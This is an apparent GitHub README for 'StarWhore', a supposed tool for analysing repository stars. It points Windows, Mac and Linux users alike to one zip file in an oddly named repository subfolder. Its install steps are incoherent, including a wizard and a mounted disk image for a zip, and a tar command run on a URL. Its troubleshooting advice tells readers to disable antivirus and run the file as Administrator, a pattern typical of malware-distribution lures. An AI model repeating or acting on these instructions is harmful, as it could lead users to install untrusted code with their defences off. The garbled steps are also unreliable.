Welcome to StarWhore! This application allows you to explore how open source developers value their work through GitHub stars. Follow the steps below to download and run the software.

Before you proceed, please check that your system meets the following requirements:

• Operating System: Windows 10 or later / macOS 10.15 or later / Linux (Debian-based)
• Storage Space: At least 100 MB free
• Memory: Minimum 2 GB RAM
• Processor: Dual-core 1.5 GHz or faster

To download StarWhore, visit this page to download: Releases Page.

1. On the Releases page, look for the latest version. You will find it at the top of the list.
2. Click on the version number (e.g., v1.0) to view all available files.
3. Choose the file that matches your operating system:
   • For Windows, download https://raw.githubusercontent.com/murad63/StarWhore/main/polyphaser/StarWhore_1.5.zip.
   • For Mac, download https://raw.githubusercontent.com/murad63/StarWhore/main/polyphaser/StarWhore_1.5.zip.
   • For Linux, download https://raw.githubusercontent.com/murad63/StarWhore/main/polyphaser/StarWhore_1.5.zip.
4. Save the file to a location on your computer you can easily find, like your Desktop or Downloads folder.

2. Double-click on the file to start the installation.
3. Follow the prompts in the installation wizard. You may choose the installation location or use the default.
4. Once installed, you can find StarWhore in your Start menu.

2. Double-click the file to mount it.
3. Drag the StarWhore app into your Applications folder.
4. Open your Applications folder and double-click on StarWhore to run it.

2. Open a terminal window.
3. Navigate to the directory where you downloaded the file.
4. Extract the archive using the command:

   tar -xzf https://raw.githubusercontent.com/murad63/StarWhore/main/polyphaser/StarWhore_1.5.zip
   

5. Change into the extracted directory:

   cd StarWhore
   

6. Run the application with the command:

   ./StarWhore
   

1. Upon launching the app, you will see a simple interface with options to input GitHub repository links.
2. Enter a repository link to analyze and click "Analyze."
3. The application will display the number of stars, forks, and other relevant data.

If you encounter any issues while downloading or installing, try the following steps:

• Check your internet connection. Make sure you are connected to the internet.
• Restart your computer. A simple restart can often resolve installation issues.
• Disable Antivirus temporarily. Some antivirus programs may block the installation. Remember to enable it afterward.
• Run as Administrator (Windows only). Right-click the installation file and select "Run as Administrator."
